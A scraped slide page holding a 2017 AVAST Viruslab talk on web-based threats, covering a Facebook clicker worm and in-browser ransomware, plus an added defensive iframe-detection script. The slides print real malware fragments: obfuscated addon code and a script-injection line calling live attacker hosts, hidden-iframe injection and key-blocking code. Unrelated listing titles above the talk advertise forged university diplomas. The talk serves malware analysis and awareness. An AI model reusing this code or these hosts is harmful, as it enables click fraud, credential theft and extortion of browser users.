Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
 
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
 
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
 
How to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptxHow to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptx
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
 
Comptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guideComptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guide
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
 
test test test test testtest test testtest test testtest test testtest test ...
test test  test test testtest test testtest test testtest test testtest test ...test test  test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...
 
This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!
 
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
 
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdfJAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
 

Where There's Money, There's Crime: Web-based Threats

  • 1. Web-based Threats Bezpečnostní hrozby na webu Jan Širmer Pavel Šrámek
  • 3. Cyber-security myths Which of these myths have you heard? • I can safely open this attachment because the e-mail came from my friend • I can protect myself from malware by not going on porn/warez sites • Malware is only a problem on Windows • Malware is created by teenage geeks simply for bragging rights • Malware is created by antivirus vendors 326. 8. 2017 AVAST Viruslab
  • 4. The crimeware business 426. 8. 2017 AVAST Viruslab
  • 5. The crimeware business Malware authors are in it for the money • LockScreens, FakeAVs and encrypting ransomware • Banking trojans • Phishing, Identity theft • Botnets offered as a service – Spam – DDoS – CPU power (bitcoin mining, hash cracking, …) All sold on black market 526. 8. 2017 AVAST Viruslab
  • 6. Traditional infection vectors The easiest way to infect a machine? Convince the user to run it himself! • social engineering Your second best bet? • zero day vulnerabilities – Java, Adobe reader, Flash • out-of-date and/or pirated OS installations • hacked websites = best free hosting  Commercial exploit kits 626. 8. 2017 AVAST Viruslab
  • 7. 726. 8. 2017 AVAST Viruslab Victim Compromised server Website content request Malicious JS vuln- check Get exploit code Malware C&C server Exploit + payloadinstall Malware communication Bot background service Traditional infection timeline
  • 8. The new option: in-browser malware Traditional attacks target a single OS platform (mostly Win32). How to attack all platforms at once? • Use the common denominator – HTML + JS, web browser • Rich JS API, have fast engines • JS-based extensions = additional surface • Attacks come from the web anyway 826. 8. 2017 AVAST Viruslab
  • 9. The new option: in-browser malware In-browser JS can do: • Click hijacking for Ad-click fraud • Worm-like spreading over social networks • Ransomware equivalent (browser lockup) • DDoS via AJAX • Even cryptocurrency mining 926. 8. 2017 AVAST Viruslab
  • 11. Click for me Click here! Click here! 26. 8. 2017 AVAST Viruslab 11
  • 12. Option A: Native executable clicker 26. 8. 2017 AVAST Viruslab 12
  • 13. Option B: Fake Flash player 26. 8. 2017 AVAST Viruslab 13
  • 14. Payloads 26. 8. 2017 AVAST Viruslab 14 BHO Win32 extension JavaScript-based extensions CRXXPI
  • 15. Payload in IE • Originally base64 obfuscated • Injecting BHO 26. 8. 2017 AVAST Viruslab 15
  • 16. Firefox plug-in Installation 26. 8. 2017 AVAST Viruslab 16
  • 18. this.prefService.savePrefFile(null); this.req("uri", "`||x2''zqfo8&em'b&x`x7}5", guid, 8);}}, http://likecyp.com/j.php?u=GUID&b=1&v=00001&r=RANDOM {this.req("buri", "lppt>++igq}em*gki+n*tlt;q9", g, inx);} http://videosnow1.asia/j.php?u=GUID&b=1&v=00001&r=RANDOM { xuri = this.dec(this.uri(m, uri), inx) + "" + g + "&b=1&v=k00001&r=" + Math.floor(Math.random() * 999999); } Dean unpacked 26. 8. 2017 AVAST Viruslab 18
  • 19. Changes in browser settings
      Preference       Status     Type     Value
      TestAddon.buri   user set   string   lppt >++igg}em*gki+n*tlt;q9
      TestAddon.ch     default    string
      TestAddon.date   user set   string   1340624313
      TestAddon.guid   user set   string   3c94f90903f031a799162872a55742e8
      TestAddon.int    user set   string   60
      TestAddon.uri    user set   string   ‘||x2””eakzg9:&i|”b&x’x7}5
    Dropped URLs
      • http://likecyp.com/j.php?u=GUID&b=1&v=00001&r=RANDOM
      • http://videosnow1.asia/j.php?u=GUID&b=1&v=00001&r=RANDOM
  • 20. The script trail
      document.createElement('script');s.type='text/javascript';s.src='http://uhnm6.me/js_f.php?v=0.05a
    • Two variants of js_f.php's returned payload: 1. Self-spreading clicker; 2. Clicker only
    • Additional functionalities: page auto-like, get online friends, solve captcha, stealing FB credentials
  • 21. Self-spreading malware: the script updates the victim's Facebook and Twitter feeds by posting new status messages
  • 22. Self-spreading malware (the lure table driving the posts):
      var videos = new Array(10);
      videos[0] = Array("80", "Kirst*en. Dunst mastur*bating on hidden camera", "It happened in United States hotel", "http://bit.ly/MTfe4S", "http://i.imgur.com/NjZPU.jpg", "", "20", "friend", "327065014030715", "431402153539537", "AQBu92VH5GDqrJkp", "2309869772");
      var flk = Array();
      if ((1 == 1)) {
        var randomnumber = Math.floor(Math.random() * 100);
        if (randomnumber > 0) {
          ...
  • 23. Injected iframe creation
      function createIframe(src) {
        var ifr = document.createElement("iframe");
        ifr.setAttribute("src", src);
        ifr.style.position = "absolute";
        ifr.style.top = "0";
        ifr.style.left = "0";
        ifr.style.width = "100%";
        ifr.style.height = "100%";
        document.body.appendChild(ifr)
      }
      function get_img_src(src, no) {
        x = src.getElementsByTagName("img");
        return x[no].id
      }
      function make_dom(src) {
        var tempDiv = document.createElement("div");
        tempDiv.innerHTML = src;
        return tempDiv
      }
  • 24. Clicker
    • BHO, Firefox and Chrome payloads all contain a link to a site like http://resultsz.com/search/anticheat6.php?username=foreste
    • The site hosts a list of other sites used by all of those "clickers" for injecting hidden iframes into every visited site and earning money for the blackhats.
  • 26. FB Clicker: Attack vector
    Exploit: ID-10-T
    • Method: social engineering (celebrities, user curiosity)
    • Target: largest social network
    Technique: impersonation
    • Common masquerade: Adobe Flash Player
    • Trained response to plugin installation prompts
    → A significant portion of users will not identify the scam
  • 27. FB Clicker: Technology
    Approach: extension-based
    • Provides extensions for 3 major browsers
    • Functionality is the same
    Technology: web-based where possible
    • IE uses native extensions (BHO = Win32 DLL)
    • FF and Chrome use JS-driven extensions
    • JavaScript code is shared
    → FF and Chrome attacks are OS-independent worms
  • 29. In-Browser Ransomware
  • 30. In-Browser Ransomware
  • 31. Geo-specific content
      function prepare_Frame(c) {
        ifrm = document.createElement("IFRAME");
        ifrm.setAttribute("src", "LEND/EN/alert.html");
        ifrm.setAttribute("class", "frame");
        ifrm.name = "iname"+c;
        ifrm.src = "LEND/EN/alert.html";
        ifrm.style.display = "none";
        ifrm.style.width = 0+"px";
        ifrm.style.height = 0+"px";
        return ifrm;
        //document.body.appendChild(ifrm);
      }
  • 32. Self-protection attempt
      function catchControlKeys(event) {
        var code = event.keyCode ? event.keyCode : event.which ? event.which : null;
        if (event.ctrlKey) {
          if (code == 117) return false; // Ctrl + u
          if (code == 85) return false;  // Ctrl + U
          if (code == 99) return false;  // Ctrl + c
          if (code == 67) return false;  // Ctrl + C
          if (code == 97) return false;  // Ctrl + a
          if (code == 65) return false;  // Ctrl + A
        }
      }
  • 33. Close prevention
  • 34. What's happening in the background? Repeated attempts to close
  • 35. Malicious site examples
  • 36. Spread
  • 38. In-browser ransomware: Attack vector
    Exploit: ID-10-T again
    • Method: poisoned links
    • Target: people looking for illegal content
    Technique: scares, threats, lies
    • Proven direct monetization scheme
    • Some panicked / guilty users really pay
    → Ransomware like any other, just faster-acting
  • 39. In-browser ransomware: Technology
    Approach: pure webpage (HTML + JS)
    • Server-side static pages + payment form
    • Later versions: geo-targeted content
    Technology: JS only (client-side)
    • Event swallowing = lock-like functionality
    • Rudimentary self-protection
    • Easily evaded by power users (who won't pay anyway)
    → Direct monetization in any modern browser!
  • 41. Reiteration
    Cybersecurity scene
    • Financially motivated criminals
    • Low awareness of inner workings
    Facebook clicker
    • Worm-like spreading behavior in JS
    • Malicious extensions
    In-browser ransomware
    • Existing formula, new implementation
    • Truly cross-platform
  • 42. Final thoughts: Know your foe
    • Bad guys will take advantage of anything
    • Everyone with a browser is a potential target
    • Average Joe's devices have a value if compromised
    Web tech can be abused
    • Cross-platform code allows cross-platform malware
    • JavaScript can do a lot
    • Not traditional exploitation, lower security measures
    → Learn which kinds of attacks are possible, educate others
  • 43. EOF – Join the discussion with AVAST developers. Follow us on Twitter and G+: @avast_devs #AVASTdevs
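As an added defender-side example (not code from the AVAST slides or the malware they describe), the following heuristic flags iframes shaped like the clicker's injected overlay on slide 23 and the ransomware's hidden geo-content frame on slide 31. The descriptor fields, function names and sample hostnames are assumptions made for this example.

```javascript
// Added example (not from the AVAST slides): flag iframes shaped like the two
// injected frames on slides 23 and 31: (a) an absolutely positioned frame
// pinned at 0,0 covering 100% x 100% (the clicker's click-hijacking overlay);
// (b) a display:none frame sized 0px x 0px that still loads a remote src
// (the ransomware's hidden geo-specific content frame). The heuristic runs on
// plain descriptors, so it works outside a browser; collectFrames() builds
// those descriptors from a live DOM.

function describeFrame(ifr) {
  // Reduce an <iframe> element to the fields the heuristic needs.
  const s = ifr.style;
  return {
    src: ifr.getAttribute("src") || "",
    position: s.position, top: s.top, left: s.left,
    width: s.width, height: s.height, display: s.display,
  };
}

function classifyFrame(f) {
  // CSSOM may serialise "0" as "0px", so accept both spellings.
  const isZero = (v) => /^0(px)?$/.test(v);
  const fullSize = f.width === "100%" && f.height === "100%";
  const pinned = f.position === "absolute" && isZero(f.top) && isZero(f.left);
  if (fullSize && pinned) return "overlay";          // slide 23 pattern
  const zeroSize = isZero(f.width) && isZero(f.height);
  if (f.display === "none" && zeroSize && f.src !== "") {
    return "hidden-loader";                          // slide 31 pattern
  }
  return "benign";
}

function scanFrames(frames) {
  // Keep only suspicious frames, with the verdict, for logging or removal.
  return frames
    .map((f) => ({ src: f.src, verdict: classifyFrame(f) }))
    .filter((r) => r.verdict !== "benign");
}

function collectFrames(doc) {
  return Array.from(doc.getElementsByTagName("iframe")).map(describeFrame);
}

// Constructed sample descriptors mirroring the slide code; hostnames are placeholders.
const SAMPLE_FRAMES = [
  { src: "http://clicker.example/ad", position: "absolute", top: "0", left: "0",
    width: "100%", height: "100%", display: "" },
  { src: "LEND/EN/alert.html", position: "", top: "", left: "",
    width: "0px", height: "0px", display: "none" },
  { src: "https://video.example/embed", position: "static", top: "", left: "",
    width: "560px", height: "315px", display: "" },
];
```

In a browser the same check runs as `scanFrames(collectFrames(document))`; a hidden frame with no src is deliberately left as benign so ordinary placeholder frames are not flagged.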

Editor's Notes

  1. There are two scenarios. The first one is a simple executable clicker and the second one is a
  2. 1) The user clicks on Kirsten's video. 2) There is malware. 3) The malware secretly infects the user's PC. 4) The malware communicates with the C&C, from which it receives a list of sites to click. 5) The malware clicks on the received sites. 6) The bad guy receives money.
  3. Inside jstest.js there are many links to different sites that are visited by the user's browser, and the attacker earns money from the clicks.
  4. Buri is the link to likecyp. Uri is the fallback link.